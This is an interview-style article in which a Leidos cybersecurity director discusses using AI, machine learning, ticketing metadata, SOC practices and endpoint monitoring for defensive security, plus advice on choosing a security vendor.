The importance of intelligence-driven approach to cybersecurity
As hackers get smarter and threat perimeters continue to change, businesses are scrambling to keep up. More and more, they are finding that the old way of protecting organizational systems and assets isn't working. As a result, they are turning to modern technologies and techniques and looking for ways to get more value out of the information they have. To learn more, we talked to Sean Black, director of cybersecurity at Leidos.
Q: It seems like more organizations are relying on automation, artificial intelligence and machine learning to improve security. What are these technologies that are becoming so important in the cyber realm?
Black: Effective cybersecurity relies on having good data and making optimum use of that data. Technologies and processes with roots in automation, AI and machine learning can help organizations make good use of that data.
One of the first areas we saw AI and machine learning adopted within the cybersecurity space was with malware. It's a great technology that helps us build and train models to look for suspicious files. For example, based on the attributes of a specific file, the model could tell you with a high degree of certainty whether it is similar to other known malware.
As AI systems gain more experience and deal with more data sets, you can do even more with it. For example, the system may decrease the priority of an alert if a high percentage of all prior alerts with similar characteristics were deemed false positives by analysts. If it can incorporate additional metadata like an IP address, domain, or URL, it can provide even more accurate guidance to the analyst. For example, for a particular alert, the system may be able to direct an analyst to use a specific tool, task or other command, based on what it has learned from ingesting information from historical tickets.
Q: What is the best way to capture information from logs and analyst findings to add to the body of knowledge for these systems?
Black: There is fantastic logging happening in the cloud, but it's to the point where you can't really consume it all, so you have to find a way to determine what's valuable. In general, this is an area within the cybersecurity domain that hasn't been addressed as well as it should be. Some organizations use a knowledge management solution, while others are using case management or integrated ticketing systems. But these only go so far, so you often need to customize them.
That's what we have done for some of our customers. We have put custom fields into a ticketing system, for example, to capture important information like whether the ticket represented a true or false positive; which tools were used; what phase or phases of the cyber kill chain were involved; what threat vector was used; and what tactics, techniques and procedures (TTP) the adversary used.
Q: How is the Security Operations Center (SOC) evolving in its protection against cyberthreats today?
Black: One of the most important ways that SOCs can help is by fostering communication. When bad things happen on a network, it can become very stressful, and that means it's critical for everybody to have a good understanding of what's happening and avoid miscommunication. All of this can become more difficult when the SOC is distributed. It means that you may have people with different types of expertise in different pockets of a SOC, and they have to find ways to share knowledge, engage one another, and foster innovation and creativity across those boundaries. It's a dance, but it's a dance worth doing, because getting it right helps ensure common processes, procedures, and TTPs across all locations or offices, a culture and sense of team that spans the entire SOC, and an environment that motivates and supports sharing and innovation.
Q: What do these things we've been discussing — automation, AI, machine learning, capturing information and SOCs —have in common?
Black: They represent what we call an intelligence-driven approach to cybersecurity. It's an approach that uses every resource possible as intelligently as possible, with the help of technology, to do battle on the cybersecurity front. And ideally, you will use all of these tools.
Q: What challenges do the inevitable blending of new infrastructure, cloud-based infrastructure and legacy systems bring to defending against cyberthreats?
Black: Every organization has some infrastructure and systems that weren't built with modern cybersecurity in mind. That's a reality, even though anything organizations are buying today is more modern. But you can get some level of information from legacy applications and hardware, even if it's just what network connections they are making, what they are communicating with and potentially, which users are logging in. Even with only that information, you can apply artificial intelligence and machine learning to start looking for anomalous behavior. It might not provide the same level of value you would get with modern technology, but there is definitely value. It's really about trying to find out what data you can get and use it as effectively as possible.
Q: Cybersecurity protection threats and techniques seems to change constantly. How can businesses keep up?
Black: Follow the data. There is so much activity today happening on the endpoint — laptops, desktops, sensors, mobile devices, and virtual endpoints scattered across the cloud — that modern operating systems and endpoint monitoring tools can easily log and forward. Network-based logs and alerts are still incredibly useful but with the increasing challenges posed by encryption and the rise of perimeterless environments, endpoint data tends to provide a far better picture of events occurring across an enterprise.
Collecting relevant, endpoint information provides visibility into processes that are running, and who is kicking off those processes and sub-processes. If you have this type of information and the right systems in place, you would easily recognize an instance where somebody opened up a PowerPoint that spawned a PowerShell command and started running commands on the command line – a combination of events that shouldn't be happening.
But that brings up another challenge: You can't analyze every input and piece of data - it would be hard to manage and very expensive. It's important to find effective ways to capture and analyze only the data you need. Remember, not all data is created equal.
Q: What should businesses look for in a partner to help them keep on top of cyber threats?
Black: Choose a vendor with a lot of experience both in cybersecurity and your sector. Also, make sure the vendor is flexible enough to think out of the box, along with a sound methodology and framework. The vendor should also have good relationships with all major cybersecurity vendors and leverage automation as much as possible. One way to determine if a vendor is a good match is to see how it has approached cybersecurity in its own company.